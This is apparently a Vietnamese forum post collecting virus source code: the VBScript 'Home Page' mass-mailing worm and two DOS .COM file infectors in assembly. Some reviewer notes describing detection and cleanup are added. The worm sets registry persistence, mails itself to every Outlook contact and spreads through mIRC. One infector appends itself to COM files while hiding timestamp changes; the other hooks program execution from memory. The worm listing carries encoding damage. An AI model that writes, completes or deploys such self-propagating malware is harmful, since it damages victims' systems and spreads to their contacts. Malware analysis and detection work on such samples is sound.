MÃ NGUỒN CỦA VIRUS HOME PAGE
'Homepage Created By Robinhood
' ---- Analysis notes (added on review; code lines left untouched) ----
' Top-level body of the "Home Page" VBScript worm.  What the visible code
' does:
'   1. copies the running script into the Windows system folder
'      (getspecialfolder(1)) as Win32.dll.vbs;
'   2. persists it through the HKLM ...\CurrentVersion\Run value "Win32dll"
'      (data: "wscript.exe <dropped path> %");
'   3. calls payload(), then sendmail() and IRC "" unless the HKLM
'      ...\CurrentVersion\Homepage\Sendmail / ...\Homepage\IRC values are
'      already 1 (nothing in this listing ever writes those values);
'   4. loops forever, re-creating its own file and the Run value whenever
'      either is missing.  There is no sleep in the loop, so the wscript.exe
'      process stays busy for as long as it runs.
' The listing carries quoted-printable transport artifacts (=3D, =20, "="
' soft line breaks) and split identifiers such as "Ru n", so it does not
' run as shown.  Cleanup order matters: stop the wscript.exe process first,
' then remove the Run value and the dropped file, or step 4 restores both.
Set FSO =3D createobject("scripting.filesystemobject")
dirsystem =3D FSO.getspecialfolder(1)
Path=3D dirsystem & "\Win32.dll.vbs"
' WSH is the shell object used for every registry read/write below
Set WSH createobject("wscript.shell")
' persistence: Run value "Win32dll" -> "wscript.exe <dropped path> %"
WSH.regwrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll",
"wscript.exe " & Path& " %"
' drop a copy of the running script into the system folder
FSO.copyfile wscript.scriptfullname, Path
' payload() only opens a URL, and as written its condition can never be true
payload=20
' mass-mail unless the Homepage\Sendmail flag is already 1
If =
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\Send
mail") <> 1 then
sendmail
End if
' mIRC propagation unless the Homepage\IRC flag is already 1
If
WSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curre ntVersion\Homepage\IRC"
) <> 1 then
IRC ""
End if
' keep the script's own text in memory so the loop below can recreate it
Set sourcefile=3D FSO.opentextfile(wscript.scriptfullname)
sourcetext sourcefile.readall
sourcefile.close
' watchdog loop: never exits; restores the file and the Run value on removal
Do
if not(FSO.fileexists(wscript.scriptfullname)) then
set filebackup=3D FSO.createtextfile(wscript.scriptfullname)
filebackup.write sourcetext
filebackup.close
end if
sWSH.regread("HKLM\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\Win32dll"
)
If s<> "wscript.exe " & Path& " %" then
WSH.regwrite =
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Win32dll", "wscript.exe " & Path& " %"
end if
s=3D ""
loop=20
' sendmail(): mass-mailing routine.
' Automates Outlook (Outlook.Application / MAPI namespace), walks every
' address list and every entry in it, and for each entry creates a mail
' item (CreateItem(0), the MailItem type) with subject "Very Important!",
' a short social-engineering body, and the dropped script (Path) attached.
' The "Attachments" member name is assembled from Chr() calls, so a plain
' text search of the script for that word will miss it.
' DeleteAfterSubmit = True presumably removes the message from Sent Items
' once sent -- verify against the Outlook object model.
' The `If myapp = "Outlook"` test relies on the object's default property
' (assumed to be the application name -- confirm).
' Detection points: wscript.exe driving Outlook automation; one outbound
' message per address-book entry, each carrying a .vbs attachment.
Function sendmail()
Set myapp =3D CreateObject("Outlook.Application")
If myapp =3D "Outlook" Then
Set myname =3D myapp.GetNameSpace("MAPI")
Set myaddlists =3D myname.AddressLists
' one message per address entry, across every address list
For Each myaddlist In myaddlists
If myaddlist.AddressEntries.Count <> 0 Then
x =3D myaddlist.AddressEntries.Count
For i =3D 1 To x
Set mailitem =3D myapp.CreateItem(0)
Set myadd =3D myaddlist.AddressEntries(i)
mailitem.To =3D myadd.Address
mailitem.Subject =3D "Very Important!"
mailitem.Body =3D "Hi:" & vbcrlf & "Please view this file, it's very
important." & vbcrlf & ""
' member name obfuscated via Chr() -- see header note
execute "set myatts =3Dmailitem." & Chr(65) & Chr(116) & Chr(116) &
Chr(97) & Chr(99) & Chr(104) & Chr(109) & Chr(101) & Chr(110) & Chr(116)
& Chr(115)
copypath Path
mailitem.DeleteAfterSubmit True
myatts.Add copypath
If mailitem.To <> "" Then
mailitem.Send
End If
Next
End If
Next
End If
End function
' IRC(ircpath): mIRC propagation routine.
' When called with an empty path (the only call on this page is IRC ""),
' it probes for mirc.ini under c:\mirc, c:\mirc32, and <ProgramFilesDir>\mirc
' or \mirc32 (ProgramFilesDir read from HKLM ...\CurrentVersion), then
' overwrites <ircpath>\script.ini (CreateTextFile(..., True)) with an
' "on 1:JOIN:#" handler that sends the dropped script (Path) to every user
' joining any channel; the command name is spelled out with Chr() calls.
' Detection/cleanup: a script.ini in the mIRC folder whose JOIN handler
' references Win32.dll.vbs; any legitimate script.ini is lost on overwrite.
Function IRC(ircpath)
If ircpath <> "" Then
programpath
WSH.regread("HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion
\ProgramFilesDir")
' locate a mIRC installation by its mirc.ini
If FSO.fileexists("c:\mirc\mirc.ini") Then
ircpath =3D "c:\mirc"
ElseIf FSO.fileexists("c:\mirc32\mirc.ini") Then
ircpath =3D "c:\mirc32"
ElseIf FSO.fileexists(programpath & "\mirc\mirc.ini") Then
ircpath =3D programpath & "\mirc"
ElseIf FSO.fileexists(programpath & "\mirc32\mirc.ini") Then
ircpath =3D programpath & "\mirc"
Else
ircpath =3D ""
End If
End If
' write the JOIN handler into script.ini (existing file is replaced)
If ircpath <> "" Then
Set ircscript =3D FSO.CreateTextFile(ircpath & "\script.ini", True)
text =3D "[script]" & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n0=3Don 1:JOIN:#:{"
text =3D text & vbCrLf & "n1=3D /if ( $nick =3D=3D $me ) { halt }"
text =3D text & vbCrLf & "n2=3D /." & Chr(100) & Chr(99) & Chr(99) & "
send $nick "
text =3D text & Path
text =3D text & vbCrLf & "n3=3D}"
ircscript.write(text)
ircscript.Close
End If
End Function=20
' payload(): as written this never fires -- 1 + Int(Rnd * 5) lies in 1..5
' and is compared with 7, so the WSH.run call on the URL is dead code.
' Even if reached it would only open a web page in the default handler.
Function payload()
Randomize
If 1 + Int(Rnd * 5) =3D 7 then
WSH.run "Http://www.virii.com.ar",false
end if
end function
; virus from ALT-11 mag
; ---------------------------------------
;
; Coded by: Azagoth
; ---------------------------------------
; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
; ---------------------------------------------------------------------------
; - Non-Overwriting .COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files. If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found. (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; ---------------------------------------------------------------------------
;---------------------------------------------------------------------------
; Analyst notes (added on review; the original per-line comments are kept):
;   What it is : direct-action (non-resident) appending .COM infector --
;                it infects, then returns control to the host or exits.
;   Artifacts  : an infected file begins with E9 (near JMP, jmp_code) whose
;                displacement points at the appended body, and ends with
;                the 2-byte marker 'AZ' (virus_id, the last data before
;                eov); length grows by virus_length.  Date/time stamps and
;                attributes are put back (restore_date_time, restore_attrib),
;                so timestamp-based triage will not flag infected files --
;                scan for the E9 head plus the trailing marker instead.
;   Scope      : one infection per run (max_infections = 1); walks from the
;                current directory up to the root; skips COMMAND.COM.
;   Payload    : removed from this listing ("Stuff deleted" under bomb:).
;---------------------------------------------------------------------------
.model tiny
.code
org 100h ; adjust for psp
start:
call get_disp ; push ip onto stack
get_disp:
pop bp ; bp holds current ip
sub bp, offset get_disp ; bp = code displacement
; original label offset is stored in machine code
; so new (ip) - original = displacement of code
save_path:
mov ah, 47h ; save cwd
xor dl, dl ; 0 = default drive
lea si, [bp + org_path]
int 21h
get_dta:
mov ah, 2fh
int 21h
mov [bp + old_dta_off], bx ; save old dta offset
set_dta: ; point to dta record
mov ah, 1ah
lea dx, [bp + dta_filler]
int 21h
search:
mov ah, 4eh ; find first file
mov cx, [bp + search_attrib] ; if successful dta is
lea dx, [bp + search_mask] ; created
int 21h
jnc clear_attrib ; if found, continue
find_next:
mov ah, 4fh ; find next file
int 21h
jnc clear_attrib
still_searching:
mov ah, 3bh
lea dx, [bp + previous_dir] ; cd ..
int 21h
jnc search
jmp bomb ; at root, no more files
clear_attrib:
mov ax, 4301h
xor cx, cx ; get rid of attributes
lea dx, [bp + dta_file_name]
int 21h
open_file:
mov ax, 3D02h ; AL=2 read/write
lea dx, [bp + dta_file_name]
int 21h
xchg bx, ax ; save file handle
; bx won't change from now on
check_if_command_com:
cld
lea di, [bp + com_com]
lea si, [bp + dta_file_name]
mov cx, 11 ; length of 'COMMAND.COM'
repe cmpsb ; repeat while equal
jne check_if_infected
jmp close_file
; infection marker check: the last two bytes of the file are compared
; with virus_id ('AZ'); a match means already infected -> close_file
check_if_infected:
mov dx, word ptr [bp + dta_file_size] ; only use first word since
; COM file
sub dx, 2 ; file size - 2
mov ax, 4200h
mov cx, 0 ; cx:dx ptr to offset from
int 21h ; origin of move
mov ah, 3fh ; read last 2 characters
mov cx, 2
lea dx, [bp + last_chars]
int 21h
mov ah, [bp + last_chars]
cmp ah, [bp + virus_id]
jne save_3_bytes
mov ah, [bp + last_chars + 1]
cmp ah, [bp + virus_id + 1]
jne save_3_bytes
jmp close_file
save_3_bytes:
mov ax, 4200h ; 00=start of file
xor cx, cx
xor dx, dx
int 21h
mov ah, 3Fh
mov cx, 3
lea dx, [bp + _3_bytes]
int 21h
goto_eof:
mov ax, 4202h ; 02=End of file
xor cx, cx ; offset from origin of move
xor dx, dx ; (i.e. nowhere)
int 21h ; ax holds file size
; since it is a COM file, overflow will not occur
save_jmp_displacement:
sub ax, 3 ; file size - 3 = jmp disp.
mov [bp + jmp_disp], ax
write_code:
mov ah, 40h
mov cx, virus_length ;*** equate
lea dx, [bp + start]
int 21h
goto_bof:
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h
write_jmp: ; to file
mov ah, 40h
mov cx, 3
lea dx, [bp + jmp_code]
int 21h
inc [bp + infections]
; the two restore_* steps below are why modified files keep their original
; timestamp and attributes
restore_date_time:
mov ax, 5701h
mov cx, [bp + dta_file_time]
mov dx, [bp + dta_file_date]
int 21h
close_file:
mov ah, 3eh
int 21h
restore_attrib:
xor ch, ch
mov cl, [bp + dta_file_attrib] ; restore original attributes
mov ax, 4301h
lea dx, [bp + dta_file_name]
int 21h
done_infecting?:
mov ah, [bp + infections]
cmp ah, [bp + max_infections]
jz bomb
jmp find_next
; payload site; the trigger code was removed from this listing
bomb:
; cmp bp, 0
; je restore_path ; original run
;
;---- Stuff deleted
restore_path:
mov ah, 3bh ; when path stored
lea dx, [bp + root] ; '\' not included
int 21h
mov ah, 3bh ; cd to original path
lea dx, [bp + org_path]
int 21h
restore_dta:
mov ah, 1ah
mov dx, [bp + old_dta_off]
int 21h
restore_3_bytes: ; in memory
lea si, [bp + _3_bytes]
mov di, 100h
cld ; auto-inc si, di
mov cx, 3
rep movsb
return_control_or_exit?:
cmp bp, 0 ; bp = 0 if original run
je exit
mov di, 100h ; return control back to prog
jmp di ; -> cs:100h
exit:
mov ax, 4c00h
int 21h
;-------- Variable Declarations --------
old_dta_off dw 0 ; offset of old dta address
;-------- dta record
dta_filler db 21 dup (0)
dta_file_attrib db 0
dta_file_time dw 0
dta_file_date dw 0
dta_file_size dd 0
dta_file_name db 13 dup (0)
;--------
search_mask db '*.COM',0 ; files to infect: *.COM
search_attrib dw 00100111b ; all files a,s,h,r
com_com db 'COMMAND.COM'
previous_dir db '..',0
root db '\',0
org_path db 64 dup (0) ; original path
infections db 0 ; counter
max_infections db 1
_3_bytes db 0, 0, 0
jmp_code db 0E9h
jmp_disp dw 0
last_chars db 0, 0 ; do last chars = ID ?
virus_id db 'AZ' ; trailing infection marker (see header note)
eov: ; end of virus
virus_length equ offset eov - offset start
end start
;---------------------------------------------------------------------------
; Analyst notes (added on review):
;   What it is : very small (VSize = 085h bytes) memory-resident .COM
;                infector that intercepts the DOS exec path: Int21 acts only
;                on AX=4B00h (Load and Execute), opens the file about to run
;                (3D02h) and infects it before falling through to End21.
;   Artifacts  : an infected file starts with 4Dh ('M') followed by a near
;                JMP (`mov ax, 0E94Dh` / stosw, then the size word); the
;                original first 4 bytes are kept in the body (Bytes).  Any
;                file whose first byte is already 4Dh -- .EXE images ('MZ')
;                and infected .COMs alike -- is skipped (scasb / je Close),
;                so each victim grows by VSize exactly once.
;   Memory     : the already-resident test compares the code at Start with
;                ES:DI after `mov es, cx` (CX=50h), so the resident copy
;                appears to live at a fixed low address, and the original
;                int 21h handler is reached through the int 69h vector slot
;                (End21 chains via cs:[69h*4]; all file I/O here is `int 69h`).
;                A populated int 69h vector on a DOS system is therefore a
;                usable memory indicator -- TODO confirm by tracing Loop0.
;---------------------------------------------------------------------------
VSize=085h
Code Segment
Assume CS:Code
org 0
db 4Dh
jmp Start
Org 600h
Bytes db 0CDh,20h,90h,90h
; entry when an infected host is loaded: restore the host's first bytes,
; then check for / perform installation (see header note)
Start: mov si, 0100h
mov bx, offset Int21
mov cx, 0050h
mov di, si
add si, [si+2]
push di
movsw
movsw
mov es, cx
cmpsb
je StartFile
dec si
dec di
rep movsw
mov es, cx
xchg ax, bx
xchg ax, cx
Loop0: xchg ax, cx
xchg ax, word ptr es:[di-120h]
stosw
jcxz Loop0
xchg ax, bx
StartFile:
push ds
pop es
ret
; exec hook: only AX=4B00h is intercepted; every other call goes to End21
Int21: cmp ax, 4B00h
jne End21
Exec: push ax
push bx
push dx
push ds
push es
mov ax, 3D02h
call DoInt21
jc EndExec
cbw ;Zero AH
cwd ;Zero DX
mov bx, si ;Move handle to BX
mov ds, ax ;Set DS and ES to 60h,
mov es, ax ;the virus data segment
mov ah, 3Fh ;Read first 4 bytes
int 69h
mov al, 4Dh
scasb ;Check for 4D5Ah or infected file mark
je Close ;.EXE or already infected
mov al, 2
call LSeek ;Seek to the end, SI now contains file size
mov cl, VSize ;Virus size in CX, prepare to write
int 69h ;AH is 40h, i.e. Write operation
mov ax, 0E94Dh ;Virus header in AX
stosw ;Store it
xchg ax, si ;Move file size in AX
stosw ;Complete JMP instruction
xchg ax, dx ;Zero AX
call LSeek ;Seek to the beginning
int 69h ;AH is 40h, write the virus header
Close: mov ah,3Eh ;Close the file
int 69h
EndExec: pop es
pop ds
pop dx
pop bx
pop ax
End21: jmp dword ptr cs:[69h * 4]
LSeek: mov ah, 42h ;Seek operation
cwd ;Zero DX
DoInt21: xor cx, cx ;External entry for Open, zero cx
int 69h
mov cl, 4 ;4 bytes will be read/written
xchg ax, si ;Store AX in SI
mov ax, 4060h ;Prepare AH for Write
xor di, di ;Zero DI
ret
VLen = $ - offset Bytes
Code EndS
End
; ─────────────────────────────────────────────────────────────────────────
; ────────────────────> and Remember Don't Forget to Call <────────────────
; ────────────> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <──────────
; ─────────────────────────────────────────────────────────────────────────
Chúc các bạn thành công
Backdoor(VNISS)